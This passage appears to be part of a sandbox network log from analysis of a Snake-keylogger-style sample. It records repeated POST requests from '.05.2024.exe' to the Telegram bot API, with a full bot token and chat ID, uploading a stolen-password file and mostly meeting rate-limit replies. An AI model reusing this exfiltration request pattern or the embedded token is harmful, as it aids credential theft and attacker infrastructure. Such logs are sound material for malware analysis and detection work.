filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:53:55 UTC	370	IN	HTTP/1.1 429 Too Many Requests Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:53:55 GMT Content-Type: application/json Content-Length: 111 Connection: close Retry-After: 26 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:53:55 UTC	111	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 32 36 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 32 36 7d 7d Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 26","parameters":{"retry_after":26}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.7	49789	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:53:55 UTC	359	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dcefd3cec495f5 Host: api.telegram.org Content-Length: 551 Connection: Keep-Alive
2024-09-27 10:53:55 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 66 64 33 63 65 63 34 39 35 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dcefd3cec495f5Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:53:56 UTC	370	IN	HTTP/1.1 429 Too Many Requests Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:53:56 GMT Content-Type: application/json Content-Length: 111 Connection: close Retry-After: 25 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:53:56 UTC	111	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 32 35 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 32 35 7d 7d Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 25","parameters":{"retry_after":25}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.7	49790	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:53:56 UTC	335	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dcf02757f53aeb Host: api.telegram.org Content-Length: 551
2024-09-27 10:53:56 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 30 32 37 35 37 66 35 33 61 65 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dcf02757f53aebContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:53:56 UTC	370	IN	HTTP/1.1 429 Too Many Requests Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:53:56 GMT Content-Type: application/json Content-Length: 111 Connection: close Retry-After: 25 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:53:56 UTC	111	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 32 35 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 32 35 7d 7d Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 25","parameters":{"retry_after":25}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.7	49791	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:53:57 UTC	359	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dcf07553701b70 Host: api.telegram.org Content-Length: 551 Connection: Keep-Alive
2024-09-27 10:53:57 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 30 37 35 35 33 37 30 31 62 37 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dcf07553701b70Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:53:58 UTC	370	IN	HTTP/1.1 429 Too Many Requests Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:53:58 GMT Content-Type: application/json Content-Length: 111 Connection: close Retry-After: 24 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:53:58 UTC	111	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 32 34 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 32 34 7d 7d Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 24","parameters":{"retry_after":24}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.7	49792	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:53:59 UTC	359	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dcf0da5cd67621 Host: api.telegram.org Content-Length: 551 Connection: Keep-Alive
2024-09-27 10:53:59 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 30 64 61 35 63 64 36 37 36 32 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dcf0da5cd67621Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:53:59 UTC	370	IN	HTTP/1.1 429 Too Many Requests Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:53:59 GMT Content-Type: application/json Content-Length: 111 Connection: close Retry-After: 22 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:53:59 UTC	111	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 32 32 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 32 32 7d 7d Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 22","parameters":{"retry_after":22}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.7	49793	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:54:00 UTC	335	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dcf153b5b03cf7 Host: api.telegram.org Content-Length: 551
2024-09-27 10:54:00 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 31 35 33 62 35 62 30 33 63 66 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dcf153b5b03cf7Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:54:00 UTC	370	IN	HTTP/1.1 429 Too Many Requests Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:54:00 GMT Content-Type: application/json Content-Length: 111 Connection: close Retry-After: 21 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:54:00 UTC	111	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 32 31 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 32 31 7d 7d Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 21","parameters":{"retry_after":21}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.7	49794	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:54:01 UTC	359	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dcf1c5e0a55f4d Host: api.telegram.org Content-Length: 551 Connection: Keep-Alive
2024-09-27 10:54:01 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 31 63 35 65 30 61 35 35 66 34 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dcf1c5e0a55f4dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:54:01 UTC	370	IN	HTTP/1.1 429 Too Many Requests Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:54:01 GMT Content-Type: application/json Content-Length: 111 Connection: close Retry-After: 20 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:54:01 UTC	111	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 32 30 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 32 30 7d 7d Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 20","parameters":{"retry_after":20}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.7	49795	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:54:02 UTC	335	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dcf2133ac4fdc1 Host: api.telegram.org Content-Length: 551
2024-09-27 10:54:02 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 32 31 33 33 61 63 34 66 64 63 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dcf2133ac4fdc1Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:54:03 UTC	370	IN	HTTP/1.1 429 Too Many Requests Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:54:03 GMT Content-Type: application/json Content-Length: 111 Connection: close Retry-After: 18 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:54:03 UTC	111	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 31 38 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 31 38 7d 7d Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 18","parameters":{"retry_after":18}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.7	49796	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:54:03 UTC	359	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dcf446742a4c93 Host: api.telegram.org Content-Length: 551 Connection: Keep-Alive
2024-09-27 10:54:03 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 34 34 36 37 34 32 61 34 63 39 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dcf446742a4c93Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:54:04 UTC	370	IN	HTTP/1.1 429 Too Many Requests Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:54:03 GMT Content-Type: application/json Content-Length: 111 Connection: close Retry-After: 18 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:54:04 UTC	111	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 31 38 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 31 38 7d 7d Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 18","parameters":{"retry_after":18}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.7	49797	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:54:05 UTC	335	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dcf4e11bdf27c5 Host: api.telegram.org Content-Length: 551
2024-09-27 10:54:05 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 34 65 31 31 62 64 66 32 37 63 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dcf4e11bdf27c5Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:54:05 UTC	370	IN	HTTP/1.1 429 Too Many Requests Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:54:05 GMT Content-Type: application/json Content-Length: 111 Connection: close Retry-After: 16 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:54:05 UTC	111	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 31 36 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 31 36 7d 7d Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 16","parameters":{"retry_after":16}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
